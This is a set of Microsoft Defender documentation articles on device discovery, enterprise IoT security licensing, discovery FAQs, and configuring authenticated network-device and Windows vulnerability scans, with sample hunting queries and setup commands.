You control where device discovery takes place. Monitored networks are where device
discovery is performed and are typically corporate networks. You can also choose to
ignore networks or select the initial discovery classification after modifying a state.
Choosing the initial discovery classification means applying the default system-made
network monitor state. Selecting the default system-made network monitor state means
that networks that were identified to be corporate, are monitored, and ones identified as
non-corporate, are ignored automatically.
1. Select Settings > Device discovery.
2. Select Monitored networks.
3. View the list of networks.
4. Select the three dots next to the network name.
5. Choose whether you want to monitor, ignore, or use the initial discovery
classification.
２ Warning
Choosing to monitor a network that was not identified by Microsoft

Defender for Endpoint as a corporate network can cause device
discovery outside of your corporate network, and may therefore detect
home or other non-corporate devices.
Choosing to ignore a network will stop monitoring and discovering
devices in that network. Devices that were already discovered won't be
removed from the inventory, but will no longer be updated, and details
will be retained until the data retention period of the Defender for
Endpoint expires.
Before choosing to monitor non-corporate networks, you must ensure
you have permission to do so.
6. Confirm that you want to make the change.
Explore devices in the network

You can use the following advanced hunting query to get more context about each
network name described in the networks list. The query lists all the onboarded devices
that were connected to a certain network within the last seven days.
Kusto
DeviceNetworkInfo
| where Timestamp > ago(7d)
| where ConnectedNetworks != ""
| extend ConnectedNetworksExp = parse_json(ConnectedNetworks)
| mv-expand bagexpansion = array ConnectedNetworks=ConnectedNetworksExp
| extend NetworkName = tostring(ConnectedNetworks ["Name"]), Description =
tostring(ConnectedNetworks ["Description"]), NetworkCategory =
tostring(ConnectedNetworks ["Category"])
| where NetworkName == "<your network name here>"
Get information on device

You can use the following advanced hunting query to get the latest complete
information on a specific device.
Kusto
DeviceInfo
| where DeviceName == "<device name here>" and isnotempty(OSPlatform)
See also
Device discovery FAQs
 Tip
Feedback

Securing IoT devices in the enterprise
Article • 12/07/2023
The number of IoT devices continues to grow exponentially across enterprise networks,
such as printers, Voice over Internet Protocol (VoIP) devices, smart TVs, and
conferencing systems scattered around many office buildings.
While the number of IoT devices continues to grow, they often lack the security
safeguards that are common on managed endpoints like laptops and mobile phones. To
bad actors, these unmanaged devices can be used as a point of entry for lateral
movement or evasion, and too often, the use of such tactics leads to the exfiltration of
sensitive information.
Microsoft Defender for IoT seamlessly integrates with Microsoft Defender XDR and
Microsoft Defender for Endpoint to provide both IoT device discovery and security value
for IoT devices, including purpose-built alerts, recommendations, and vulnerability data.
Enterprise IoT security in Microsoft Defender

XDR
Enterprise IoT security in Microsoft Defender XDR provides IoT-specific security value,
including alerts, risk and exposure levels, vulnerabilities, and recommendations in
If you're a Microsoft 365 E5 (ME5)/ E5 Security and Defender for Endpoint P2

customer, toggle on support for Enterprise IoT Security in the Microsoft Defender
Portal.
If you don't have ME5/E5 Security licenses, but you're a Microsoft Defender for
Endpoint customer, start with a free trial or purchase standalone, per-device
licenses to gain the same IoT-specific security value.
Alerts
Most Microsoft Defender for Endpoint network-based detections are also relevant for
Enterprise IoT devices. For example, network-based detections include alerts for scans
involving managed endpoints.
For more information, see Alerts queue in Microsoft 365 Defender.
Recommendations
The following Defender for Endpoint security recommendations are supported for
Enterprise IoT devices:
Require authentication for Telnet management interface

Disable insecure administration protocol – Telnet
Remove insecure administration protocols SNMP V1 and SNMP V2
Require authentication for VNC management interface
For more information, see Security recommendations.
Frequently asked questions

This section provides a list of frequently asked questions about securing Enterprise IoT
networks with Microsoft Defender for IoT.
What is the difference between OT and Enterprise IoT?

Operational Technology (OT): OT network sensors use agentless, patented
technology to discover, learn, and continuously monitor network devices for a
deep visibility into Operational Technology (OT) / Industrial Control System (ICS)
risks. Sensors carry out data collection, analysis, and alerting on-site, making them
ideal for locations with low bandwidth or high latency.
Enterprise IoT: Enterprise IoT provides visibility and security for IoT devices in the
corporate environment.
Enterprise IoT network protection extends agentless features beyond operational

environments, providing coverage for all IoT devices in your environment. For
example, an enterprise IoT environment might include printers, cameras, and
purpose-built, proprietary, devices.
Which devices are supported for Enterprise IoT security?

Enterprise IoT security encompasses a broad spectrum of devices, identified by Defender
for Endpoint using both passive and active discovery methods.
The supported devices include an extensive range of hardware models and vendors,
spanning corporate IoT devices such as printers, cameras, and VoIP phones, among
others.
For more information, see Defender for IoT devices.
How can I start using Enterprise IoT?

Microsoft E5 (ME5) and E5 Security customers already have devices supported for
enterprise IoT security. If you only have a Defender for Endpoint P2 license, you can
purchase standalone, per-device licenses for enterprise IoT monitoring, or use a trial.
Get started with enterprise IoT monitoring in Microsoft Defender XDR

Manage enterprise IoT monitoring support with Microsoft Defender for IoT
What permissions do I need to use Enterprise IoT security

with Defender for IoT?
For information on required permissions, see Prerequisites.
Which devices are billable?

For more information, see Devices monitored by Defender for IoT.
How should I estimate the number of devices I want to

monitor?
For more information, see Calculate monitored devices for Enterprise IoT monitoring.
How can I cancel Enterprise IoT?

For more information, see Turn off enterprise IoT security.
What happens when the trial ends?

If you haven't added a standalone license by the time your trial ends, your trial is
automatically canceled, and you lose access to Enterprise IoT security features.
For more information, see Defender for IoT subscription billing.
How can I resolve billing issues associated with my

Defender for IoT plan?
For any billing or technical issues, open a support ticket for Microsoft Defender XDR.
Related content
Get started with enterprise IoT monitoring in Microsoft 365 Defender

Defender for IoT subscription billing
Alerts queue in Microsoft 365 Defender
Manage your device inventory from the Azure portal
Proactively hunt with advanced hunting in Microsoft 365 Defender
Next steps
Start securing your Enterprise IoT network resources with by onboarding to Defender for
IoT from Microsoft Defender XDR.
Get started with enterprise IoT
monitoring in Microsoft Defender XDR
Article • 12/07/2023
This article describes how Microsoft Defender for Endpoint customers can monitor
enterprise IoT devices in their environment, using added security value in Microsoft
Defender XDR.
While IoT device inventory is already available for Defender for Endpoint P2 customers,
turning on enterprise IoT security adds alerts, recommendations, and vulnerability data,
purpose-built for IoT devices in your enterprise network.
IoT devices include printers, cameras, VOIP phones, smart TVs, and more. Turning on
enterprise IoT security means, for example, that you can use a recommendation in
Microsoft Defender XDR to open a single IT ticket for patching vulnerable applications
across both servers and printers.
Prerequisites
Before you start the procedures in this article, read through Secure IoT devices in the
enterprise to understand more about the integration between Defender for Endpoint
and Defender for IoT.
Make sure that you have:
IoT devices in your network, visible in the Microsoft Defender XDR Device
inventory
Access to the Microsoft Defender Portal as a Security administrator
One of the following licenses:
A Microsoft 365 E5 (ME5) or E5 Security license
Microsoft Defender for Endpoint P2, with an extra, standalone Microsoft

Defender for IoT - EIoT Device License - add-on license, available for purchase
or trial from the Microsoft 365 admin center.
 Tip
If you have a standalone license, you don't need to toggle on Enterprise IoT
Security and can skip directly to View added security value in Microsoft
Defender XDR.
For more information, see Enterprise IoT security in Microsoft Defender XDR.
Turn on enterprise IoT monitoring

This procedure describes how to turn on enterprise IoT monitoring in Microsoft
Defender XDR, and is relevant only for ME5/E5 Security customers.
Skip this procedure if you have one of the following types of licensing plans:
Customers with legacy Enterprise IoT pricing plan and an ME5/E5 Security license.
Customers with standalone, per-device licenses added on to Microsoft Defender
for Endpoint P2. In such cases, the Enterprise IoT security setting is turned on as
read-only.
To turn on enterprise IoT monitoring:
1. In Microsoft Defender XDR , select Settings > Device Discovery > Enterprise IoT.
７ Note
Ensure you have turned on Device Discovery in Settings > Endpoints > Advanced
Features.
2. Toggle the Enterprise IoT security option to On. For example:
View added security value in Microsoft

Defender XDR
This procedure describes how to view related alerts, recommendations, and
vulnerabilities for a specific device in Microsoft Defender XDR, when the Enterprise IoT
security option is turned on.
To view added security value:
1. In Microsoft Defender XDR , select Assets > Devices to open the Device
inventory page.
2. Select the IoT devices tab and select a specific device IP to drill down for more
details. For example:
3. On the device details page, explore the following tabs to view data added by the
enterprise IoT security for your device:
On the Alerts tab, check for any alerts triggered by the device. Simulate alerts
in Microsoft 365 Defender for Enterprise IoT using the Raspberry Pi scenario
available in the Microsoft 365 Defender Evaluation & Tutorials page.
You can also set up advanced hunting queries to create custom alert rules.
For more information, see sample advanced hunting queries for Enterprise
IoT monitoring.
On the Security recommendations tab, check for any recommendations

available for the device to reduce risk and maintain a smaller attack surface.
On the Discovered vulnerabilities tab, check for any known CVEs associated
with the device. Known CVEs can help decide whether to patch, remove, or
contain the device and mitigate risk to your network. Alternatively, use
advanced hunting queries to collect vulnerabilities across all your devices.
To hunt for threats:

On the Device inventory page, select Go hunt to query devices using tables like the
DeviceInfo table. On the Advanced hunting page, query data using other schemas.
Sample advanced hunting queries for

Enterprise IoT
This section lists sample advanced hunting queries that you can use in Microsoft 365
Defender to help you monitor and secure your IoT devices with Enterprise for IoT
security.
Find devices by specific type or subtype

Use the following query to identify devices that exist in your corporate network by type
of device, such as routers:
Kusto
DeviceInfo
| where DeviceType == "NetworkDevice" and DeviceSubtype == "Router"
Find and export vulnerabilities for your IoT devices

Use the following query to list all vulnerabilities on your IoT devices:
Kusto
DeviceInfo
| where DeviceCategory =~ "iot"
| join kind=inner DeviceTvmSoftwareVulnerabilities on DeviceId
For more information, see Advanced hunting and Understand the advanced hunting
schema.
Next steps
Manage enterprise IoT monitoring
support with Microsoft Defender for IoT
Article • 12/07/2023
Enterprise IoT security monitoring with Defender for IoT is supported by a Microsoft 365
E5 (ME5) or E5 Security license, or extra standalone, per-device licenses purchased as
add-ons to Microsoft Defender for Endpoint.
This article describes how to:
Calculate the devices detected in your environment so that you can understand if
you need extra, standalone licenses.
Cancel support for enterprise IoT monitoring with Microsoft Defender for IoT
If you're looking to manage OT plans, see Manage Defender for IoT plans for OT security
monitoring.
Prerequisites
Before performing the procedures in this article, make sure that you have:
One of the following sets of licenses:

A Microsoft 365 E5 (ME5) or E5 Security license and a Microsoft Defender for
Endpoint P2 license
A Microsoft Defender for Endpoint P2 license alone
For more information, see Enterprise IoT security in Microsoft Defender XDR.
Access to the Microsoft Defender Portal as a Global administrator
Obtain a standalone, Enterprise IoT trial license

This procedure describes how to start using a trial, standalone license for enterprise IoT
monitoring, for customers who have a Microsoft Defender for Endpoint P2 license only.
Customers with ME5/E5 Security plans have support for enterprise IoT monitoring
available on by default, and don't need to start a trial. For more information, see Get
started with enterprise IoT monitoring in Microsoft Defender XDR.
Start your enterprise IoT trial using the Microsoft Defender for IoT - EIoT Device License
- add-on wizard or via the Microsoft 365 admin center.
To start an Enterprise IoT trial:
1. Go to the Microsoft 365 admin center > Marketplace.
2. Search for the Microsoft Defender for IoT - EIoT Device License - add-on and
filter the results by Other services. For example:
） Important
The prices shown in this image are for example purposes only and are not
intended to reflect actual prices.
3. Under Microsoft Defender for IoT - EIoT Device License - add-on, select Details.
4. On the Microsoft Defender for IoT - EIoT Device License - add-on page, select
Start free trial. On the Check out page, select Try now.
 Tip
Make sure to assign your licenses to specific users to start using them.
For more information, see Free trial.
Calculate monitored devices for Enterprise IoT

monitoring
Use the following procedure to calculate how many devices you need to monitor if:
You're an ME5/E5 Security customer and thinks you need to monitor more devices
than the devices allocated per ME5/E5 Security license
You're a Defender for Endpoint P2 customer who's purchasing standalone
enterprise IoT licenses
To calculate the number of devices you're monitoring::
1. In Microsoft Defender XDR , select Assets > Devices to open the Device
inventory page.
2. Add the total number of devices listed on both the Network devices and IoT
devices tabs.
For example:
3. Round up your total to a multiple of 100 and compare it against the number of
licenses you have.
For example:
In the Microsoft Defender XDR Device inventory, you have 473 network devices
and 1206 IoT devices.
Added together, the total is 1679 devices.
You have 320 ME5 licenses, which cover 1600 devices
You need 79 standalone devices to cover the gap.
For more information, see the Defender for Endpoint Device discovery overview.
７ Note
Devices listed on the Computers & Mobile tab, including those managed by
Defender for Endpoint or otherwise, are not included in the number of devices
monitored by Defender for IoT.
Purchase standalone licenses
Purchase standalone, per-device licenses if you're an ME5/E5 Security customer who
needs more than the five devices allocated per license, or if you're a Defender for
Endpoint customer who wants to add enterprise IoT security to your organization.
To purchase standalone licenses:
1. Go to the Microsoft 365 admin center Billing > Purchase services. If you don't
have this option, select Marketplace instead.
2. Search for the Microsoft Defender for IoT - EIoT Device License - add-on and
filter the results by Other services. For example:
） Important
The prices shown in this image are for example purposes only and are not
intended to reflect actual prices.
3. On the Microsoft Defender for IoT - EIoT Device License - add-on page, enter
your selected license quantity, select a billing frequency, and then select Buy.
For more information, see the Microsoft 365 admin center help.
Turn off enterprise IoT security

This procedure describes how to turn off enterprise IoT monitoring in Microsoft
Defender XDR, and is supported only for customers who don't have any standalone,
per-device licenses added on to Microsoft Defender XDR.
Turn off the Enterprise IoT security option if you're no longer using the service.
To turn off enterprise IoT monitoring:
1. In Microsoft Defender XDR , select Settings > Device discovery > Enterprise IoT.
2. Toggle the option to Off.
You stop getting security value in Microsoft Defender XDR, including purpose-built
alerts, vulnerabilities, and recommendations.
Cancel a legacy Enterprise IoT plan

If you have a legacy Enterprise IoT plan, are not an ME5/E5 Security customer, and no
longer to use the service, cancel your plan as follows:
1. In Microsoft Defender XDR portal, select Settings > Device discovery >
Enterprise IoT.
2. Select Cancel plan. This page is available only for legacy Enterprise IoT plan
customers.
After you cancel your plan, the integration stops and you'll no longer get added security
value in Microsoft Defender XDR, or detect new Enterprise IoT devices in Defender for
IoT.
The cancellation takes effect one hour after confirming the change. This change appears
on your next monthly statement, and you're charged based on the length of time the
plan was in effect.
） Important
If you've registered an Enterprise IoT network sensor (Public preview), device data
collected by the sensor remains in your Microsoft Defender XDR instance. If you're
canceling the Enterprise IoT plan because you no longer need the service, make
sure to manually delete data from Microsoft Defender XDR as needed.
Next steps
Securing IoT devices in the enterprise

Defender for IoT subscription billing
Manage sensors with Defender for IoT in the Azure portal
Create an additional Azure subscription
Upgrade your Azure subscription
Device discovery frequently asked
questions
Article • 08/10/2023
Applies to:

） Important

Find answers to frequently asked questions (FAQs) about device discovery.
What is Basic discovery mode?

This mode allows every Microsoft Defender for Endpoint onboarded device to collect
network data and discover neighboring devices. Onboarded endpoints passively collect
events in the network and extract device information from them. No network traffic is
initiated. Onboarded endpoints extract data from every network traffic that is seen by an
onboarded device. This data used to list unmanaged devices in your network.
Can I disable Basic discovery?

You have the option to turn off device discovery through the Advanced features page.
However, you'll lose visibility on unmanaged devices in your network. Note that even if
device discovery is turned off, SenseNDR.exe will still be running on the onboarded
devices.
What is Standard discovery mode?

In this mode, endpoints onboarded to Microsoft Defender for Endpoint can actively
probe observed devices in the network to enrich collected data (with negligible amount
of network traffic). Only devices that were observed by the basic discovery mode are
actively probed in standard mode. This mode is highly recommended for building a
reliable and coherent device inventory. If you choose to disable this mode, and select
Basic discovery mode, you'll likely only gain limited visibility of unmanaged endpoints in
your network.
Standard mode also leverages common discovery protocols that use multicast queries in
the network to find even more devices, in addition to the ones that were observed using
the passive method.
Can I control which devices perform Standard

discovery?
You can customize the list of devices that are used to perform Standard discovery. You
can either enable Standard discovery on all the onboarded devices that also support this
capability (currently Windows 10 or later and Windows Server 2019 or later devices only)
or select a subset or subsets of your devices by specifying their device tags. In this case,
all other devices are configured to run Basic discovery only. The configuration is
available in the device discovery settings page.
Can I exclude unmanaged devices from the

device inventory list?
Yes, you can apply filters to exclude unmanaged devices from the device inventory list.
You can also use the onboarding status column on API queries to filter out unmanaged
devices.
Which onboarded devices can perform

discovery?
Onboarded devices running on Windows 10 version 1809 or later, Windows 11,
Windows Server 2019, or Windows Server 2022 can perform discovery.
What happens if my onboarded devices is

connected to my home network, or to public
access point?
The discovery engine distinguishes between network events that are received in the
corporate network versus outside of the corporate network. By correlating network
identifiers across all tenant's clients, events are differentiated between ones that were
received from private networks and corporate networks. For example, if most devices in
the organization report that they're connected to the same network name, with the
same default gateway and DHCP server address, it can be assumed that this network is
likely a corporate network. Private network devices won't be listed in the inventory and
won't be actively probed.
What protocols are you capturing and

analyzing?
By default, all onboarded devices running on Windows 10 version 1809 or later,
Windows 11, Windows Server 2019, or Windows Server 2022 are capturing and
analyzing the following protocols: ARP, CDP, DHCP, DHCPv6, IP (headers), LLDP, LLMNR,
mDNS, MNDP, MSSQL, NBNS, SSDP, TCP (SYN headers), UDP (headers), WSD
Which protocols do you use for active probing

in Standard discovery?
When a device is configured to run Standard discovery, exposed services are being
probed by using the following protocols: ARP, FTP, HTTP, HTTPS, ICMP, LLMNR, NBNS,
RDP, SIP, SMTP, SNMP, SSH, Telnet, UPNP, WSD, SMB, NBSS, IPP, PJL, RPC, mDNS, DHCP,
AFP, CrestonCIP, IphoneSync, WinRM, VNC, SLP, LDAP
In addition, device discovery might also scan other commonly used ports to improve
classification accuracy & coverage.
How can I exclude targets from being probed

with Standard discovery?
If there are devices on your network, which shouldn't be actively probed, you can also
define a list of exclusions to prevent them from being scanned. The configuration is
available in the device discovery settings page.
７ Note
Devices might still reply to multicast discovery attempts in the network. Those
devices will be discovered but won't be actively probed.
Can I exclude devices from being discovered?

As device discovery uses passive methods to discover devices in the network, any device
that communicates with your onboarded devices in the corporate network can be
discovered and listed in the inventory. You can exclude devices from active probing only.
How frequent is the active probing?

Devices will actively be probed when changes in device characteristics are observed to
make sure the existing information is up to date (typically, devices probed no more than
once in a three-week period)
My security tool raised alert on

UnicastScanner.ps1 / PSScript_{GUID}.ps1 or
port scanning activity initiated by it, what
should I do?
The active probing scripts are signed by Microsoft and are safe. You can add the
following path to your exclusion list: C:\ProgramData\Microsoft\Windows Defender
Advanced Threat Protection\Downloads\*.ps1
What is the amount of traffic being generated

by the Standard discovery active probe?
Active probing can generate up to 50Kb of traffic between the onboarded device and
the probed device, every probing attempt
Why is there a discrepancy between "can be

onboarded" devices in the device inventory,
and the number of "devices to onboard" in the
dashboard tile?
You may notice differences between the number of listed devices under "can be
onboarded" in the device inventory, "onboard to Microsoft Defender for Endpoint"
security recommendation, and "devices to onboard" dashboard widget.
The security recommendation and the dashboard widget are for devices that are stable
in the network; excluding ephemeral devices, guest devices and others. The idea is to
recommend on persistent devices that also imply on the overall security score of the
organization.
Can I onboard unmanaged devices that were

found?
Yes. You can onboard unmanaged devices manually. Unmanaged endpoints in your
network introduce vulnerabilities and risks to your network. Onboarding them to the
service can increase the security visibility on them.
I've noticed that unmanaged device health

state is always "Active", why is that?
Temporarily, unmanaged device health state is "Active" during the standard retention
period of the device inventory, regardless of their actual state.
Does standard discovery look like malicious

network activity?
When considering Standard discovery, you may be wondering about the implications of
probing, and specifically whether security tools might suspect such activity as malicious.
The following subsection explains why, in almost all cases, organizations should have no
concerns around enabling Standard discovery.
Probing is distributed across all Windows devices on the

network
As opposed to malicious activity, which would typically scan the entire network from a
few compromised devices, Microsoft Defender for Endpoint's Standard discovery
probing is initiated from all onboarded Windows devices making the activity benign and
non-anomalous. The probing is centrally managed from the cloud to balance the
probing attempt between all the supported onboarded devices in the network.
Active probing generates negligible amount of extra
traffic
Unmanaged devices would typically get probed no more than once in a three-week
period and generate less than 50KB of traffic. Malicious activity usually includes high
repetitive probing attempts and in some cases data exfiltration that generates a
significant amount of network traffic that can be identified as an anomaly by network
monitoring tools.
Your Windows device already runs active discovery

Active discovery capabilities have always been embedded in the Windows operating
system, to find nearby devices, endpoints, and printers, for easier "plug and play"
experiences and file sharing between endpoints in the network. Similar functionality is
implemented in mobile devices, network equipment and inventory applications just to
name a few.
Standard discovery uses the same discovery methods to identify devices and to have a
unified visibility for all the devices in your network in the Microsoft Defender XDR
Device Inventory. For example – Standard discovery identifies nearby endpoints in the
network the same way Windows lists available printers in the network.
Network security and monitoring tools are indifferent to such activities performed by
devices on the network.
Only unmanaged devices are being probed

The device discovery capabilities have been built to only discover and identify
unmanaged devices on your network. This means that previously discovered devices
that are already onboarded with Microsoft Defender for Endpoint won't be probed.
You can exclude network lures from active probing

Standard discovery supports exclusion of devices or ranges (subnets) from active
probing. If you have network lures deployed in place, you can use the Device Discovery
settings to define exclusions based on IP addresses or subnets (a range of IP addresses).
Defining those exclusions ensure that those devices won't be actively probed and won't
be alerted. Those devices are discovered using passive methods only (similar to Basic
discovery mode).
 Tip
Feedback

Network device discovery and
vulnerability management
Article • 04/06/2023
Applies to:

Defender Vulnerability Management
７ Note
The Network device discovery and vulnerability assessments Blog (published

04-13-2021) provides insights into the new Network device discovery capabilities
in Defender for Endpoint. This article provides an overview of the challenge that
Network device discovery is designed to address, and detailed information about
how get started using these new capabilities.
Network discovery capabilities are available in the Device inventory section of the
Microsoft Defender portal and Microsoft Defender XDR consoles.
A designated Microsoft Defender for Endpoint device is used on each network segment
to perform periodic authenticated scans of preconfigured network devices. Once
discovered, Defender for Endpoint's Vulnerability Management capabilities provide
integrated workflows to secure discovered switches, routers, WLAN controllers, firewalls,
and VPN gateways.
Once the network devices are discovered and classified, security administrators are able
to receive the latest security recommendations and review recently discovered
vulnerabilities on network devices deployed across their organizations.
Approach
Network devices aren't managed as standard endpoints since Defender for Endpoint
doesn't have a sensor built into the network devices themselves. These types of devices
require an agentless approach where a remote scan obtains the necessary information
from the devices. Depending on the network topology and characteristics, a single
device or a few devices onboarded to Microsoft Defender for Endpoint performs
authenticated scans of network devices using SNMP (read-only).
There are two types of devices to keep in mind:
Scanning device: A device that's already onboarded that you use to scan the
network devices.
Network devices: The network devices you plan to scan and onboard.
Vulnerability management for network devices

Once the network devices are discovered and classified, security administrators are able
to receive the latest security recommendations and review recently discovered
vulnerabilities on network devices deployed across their organizations.
Operating systems that are supported

The following operating systems are currently supported:
Cisco IOS, IOS-XE, NX-OS

Fortinet FortiOS
Juniper JUNOS
HPE Aruba Networking ArubaOS, AOS-CX
HPE ArubaOS, Procurve Switch Software
Palo Alto Networks PAN-OS
More networking vendors and OS will be added over time, based on data gathered from
customer usage. Therefore, you're encouraged to configure all your network devices,
even if they're not specified in this list.
How to get started

Your first step is to select a device that performs the authenticated network scans.
1. Decide on a Defender for Endpoint onboarded device (client or server) that has a
network connection to the management port for the network devices you plan on
scanning.
2. SNMP traffic between the Defender for Endpoint scanning device and the targeted
network devices must be allowed (for example, by the Firewall).
3. Decide which network devices will be assessed for vulnerabilities (for example: a
Cisco switch or a Palo Alto Networks firewall).
4. Make sure SNMP read-only is enabled on all configured network devices to allow
the Defender for Endpoint scanning device to query the configured network
devices. 'SNMP write' isn't needed for the proper functionality of this feature.
5. Obtain the IP addresses of the network devices to be scanned (or the subnets
where these devices are deployed).
6. Obtain the SNMP credentials of the network devices (for example: Community
String, noAuthNoPriv, authNoPriv, authPriv). You're required to provide the
credentials when configuring a new scan job.
7. Proxy client configuration: No extra configuration is required other than the

Defender for Endpoint device proxy requirements.
8. To allow the scanner to be authenticated and work properly, it's essential that you
add the following domains/URLs:
login.windows.net
*.security.microsoft.com
login.microsoftonline.com
*.blob.core.windows.net/networkscannerstable/*
７ Note
Not all URLs are specified in the Defender for Endpoint documented list of
allowed data collection.
Permissions
To configure scan jobs, the following user permission option is required: Manage
security settings in Defender. You can find the permission by going to Settings > Roles.
For more information, see Create and manage roles for role-based access control.
Windows version pre-requisite for the scanner

The scanner is supported on Windows 10, version 1903 and Windows Server, version
1903 and later. For more information, see Windows 10, version 1903 and Windows
Server, version 1903 .
７ Note
There's a limit of 40 scanner installations per tenant.
Install the scanner

1. Go to Microsoft 365 security > Settings > Device discovery > Authenticated
scans.
2. Download the scanner and install it on the designated Defender for Endpoint
scanning device.
Scanner installation & registration

The signing-in process can be completed on the designated scanning device itself or
any other device (for example, your personal client device).
７ Note
Both the account the user signs in with and the device being used to complete the
sign in process, must be in the same tenant where the device is onboarded to
To complete the scanner registration process:
1. Copy and follow the URL that appears on the command line and use the provided
installation code to complete the registration process.
７ Note
You may need to change Command Prompt settings to be able to copy the
URL.
2. Enter the code and sign in using a Microsoft account that has the Defender for
Endpoint permission called "Manage security settings in Defender."
3. When finished, you should see a message confirming you've signed in.
Updates for scanner

The scanner has a scheduled task that, by default, is configured to look for updates
regularly. When the task runs, it compares the version of the scanner on the client
device to the version of the agent on the update location. The update location is where
Windows looks for updates, such as on a network share or from the internet.
If there's a difference between the two versions, the update process determines which
files are different and need to be updated on the local computer. Once the required
updates are determined, the downloading of the updates will start.
It's possible to disable automatic updates of the scanner by going to the MDATP
Network Scanner Updater inside the Windows Task Scheduler. To do this:
In Windows, go to Computer Management > Task Scheduler > Task Scheduler

Library.
Select MDATP Network Scanner Updater > right-click > and select Disable.
To re-enable, right-click on MDATP Network Scanner Updater and select Enable.
Configure a new network device authenticated

scan
1. Go to Settings > Device discovery > Authenticated scans in the Microsoft
Defender portal .
2. Select Add new scan and choose Network device authenticated scan and select
Next.

3. Choose whether to Activate scan.
4. Enter a Scan name.
5. Select the Scanning device: The onboarded device you use to scan the network
devices.
6. Enter the Target (range): The IP address ranges or hostnames you want to scan.
You can either enter the addresses or import a CSV file. Importing a file overrides
any manually added addresses.
7. Select the Scan interval: By default, the scan runs every four hours, you can change
the scan interval or have it only run once, by selecting 'Don't repeat'.
8. Choose your Authentication method.
You can select to Use azure KeyVault for providing credentials: If you
manage your credentials in Azure KeyVault, you can enter the Azure KeyVault
URL and Azure KeyVault secret name to be accessed by the scanning device
to provide credentials. The secret value is dependent on the Authenticated
Method you choose:
ﾉ Expand table
Authentication Method Azure KeyVault secret value
AuthPriv Username;AuthPassword;PrivPassword
AuthNoPriv Username;AuthPassword
CommunityString CommunityString
9. Select Next to run or skip the test scan.
10. Select Next to review the settings and the select Submit to create your new
network device authenticated scan.
７ Note
To prevent device duplication in the network device inventory, make sure each IP
address is configured only once across multiple scanning devices.
Scan and add network devices

During the set-up process, you can perform a one time test scan to verify that:
There's connectivity between the Defender for Endpoint scanning device and the
configured target network devices.
The configured SNMP credentials are correct.
Each scanning device can support up to 1,500 successful IP addresses scan. For example,
if you scan 10 different subnets where only 100 IP addresses return successful results,
you'll be able to scan 1,400 IP additional addresses from other subnets on the same
scanning device.
If there are multiple IP address ranges/subnets to scan, the test scan results take several
minutes to show up. A test scan is available for up to 1,024 addresses.
Once the results show up, you can choose which devices will be included in the periodic
scan. If you skip viewing the scan results, all configured IP addresses are added to the
network device authenticated scan (regardless of the device's response). The scan
results can also be exported.
Device inventory
Newly discovered devices are shown under the new Network devices tab in the Device
inventory page. It may take up to two hours after adding a scanning job until the
devices are updated.

Troubleshooting
Scanner installation has failed

Verify that the required URLs are added to the allowed domains in your firewall settings.
Also, make sure proxy settings are configured as described in Configure device proxy
The Microsoft.com/devicelogin web page did not show

up
Verify that the required URLs are added to the allowed domains in your firewall. Also,
make sure proxy settings are configured as described in Configure device proxy and
Internet connectivity settings.
Network devices are not shown in the device inventory

after several hours
The scan results should be updated a few hours after the initial scan that took place
after completing the network device authenticated scan configuration.
If devices are still not shown, verify that the service 'MdatpNetworkScanService' is
running on your devices being scanned, on which you installed the scanner, and
perform a "Run scan" in the relevant network device authenticated scan configuration.
If you still don't get results after 5 minutes, restart the service.
Devices last seen time is longer than 24 hours

Validate that the scanner is running properly. Then go to the scan definition and select
"Run test." Check what error messages are returning from the relevant IP addresses.
My scanner is configured but scans aren't running

As the authenticated scanner currently uses an encryption algorithm that isn't compliant
with Federal Information Processing Standards (FIPS), the scanner can't operate when an
organization enforces the use of FIPS compliant algorithms.
To allow algorithms that aren't compliant with FIPS, set the following value in the
registry for the devices where the scanner will run:
Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\FipsAlgorith
mPolicy with a DWORD value named Enabled and value of 0x0
FIPS compliant algorithms are only used in relation to departments and agencies of the
United States federal government.
Required Defender Vulnerability Management user

permission
Registration finished with an error: "It looks like you don't have sufficient permissions for
adding a new agent. The required permission is 'Manage security settings in Defender'."
Press any key to exit.
Ask your system administrator to assign you the required permissions. Alternately, ask
another relevant member to help you with the sign-in process by providing them with
the sign-in code and link.
Registration process fails using provided link in the

command line in registration process
Try a different browser or copy the sign-in link and code to a different device.
Text too small or can't copy text from command line

Change command-line settings on your device to allow copying and change text size.
Related articles
Device inventory
Windows authenticated scan
 Tip
Feedback

Article • 11/15/2023
Applies to:

Microsoft Defender for Servers Plan 2
７ Note
To use this feature you'll require Microsoft Defender Vulnerability Management

Standalone or if you're already a Microsoft Defender for Endpoint Plan 2 customer,
the Defender Vulnerability Management add-on.
Authenticated scan for Windows provides the ability to run scans on unmanaged
Windows devices. You can remotely target by IP ranges or hostnames and scan
Windows services by providing Microsoft Defender Vulnerability Management with
credentials to remotely access the devices. Once configured the targeted unmanaged
devices will be scanned regularly for software vulnerabilities. By default, the scan will run
every four hours with options to change this interval or have it only run once.
Security administrators can then see the latest security recommendations and review
recently discovered vulnerabilities for the targeted device in the Microsoft Defender
portal .
 Tip
Did you know you can try all the features in Microsoft Defender Vulnerability
Management for free? Find out how to sign up for a free trial.
Scanner Installation
Similar to network device authenticated scan, you'll need a scanning device with the
scanner installed. If you don't already have the scanner installed, see Install the scanner
for steps on how to download and install it.
７ Note
No changes are required for pre-existing installed scanners.
Pre-requisites
The following section lists the pre-requisites you need to configure to use Authenticated
scan for Windows.
Scanning account
A scanning account is required to remotely access the devices. This must be a Group
Managed Service Account (gMsa).
７ Note
We recommend the gMSA account is a least privileged account with only the
required scanning permissions and is set to cycle the password regularly.
To create a gMsa account:
1. On your domain controller in a PowerShell window, run:
PowerShell
New-ADServiceAccount -Name gmsa1 -

PrincipalsAllowedToRetrieveManagedPassword scanner-win11-i$ -
KerberosEncryptionType RC4, AES128, AES256 -Verbose
gmsa1 stands for the name of the account you are creating, and scanner-
win11-I$ stands for the machine name where the scanner agent will run. Only
this machine will be able to retrieve the account password. You can provide a
comma separated list of machines.
Modifying an existing account can be done with Get-ADServiceAccount and
Set-ADServiceAccount
2. To Install the AD Service Account, on the machine where the scanner agent will run
using an elevated PowerShell window, run:
PowerShell
Install-ADServiceAccount -Identity gmsa1

If your PowerShell doesn't recognize those commands, it probably means you're missing
a required PowerShell module. Instructions on how to install the module vary depending
on your operating system. For more information, see Getting Started with Group
Managed Service Accounts.
Devices to be scanned
Use the table below for guidance on the configurations required, along with the
permissions needed for the scanning account, on each device to be scanned:
７ Note
The below steps are only one recommended way to configure the permissions on
each device to be scanned and uses the Performance Monitor Users group. You can
also configure the permissions in the following ways:
Add the account to a different user group and give all the permissions
required to that group.
Give these permissions explicitly to the scanning account.
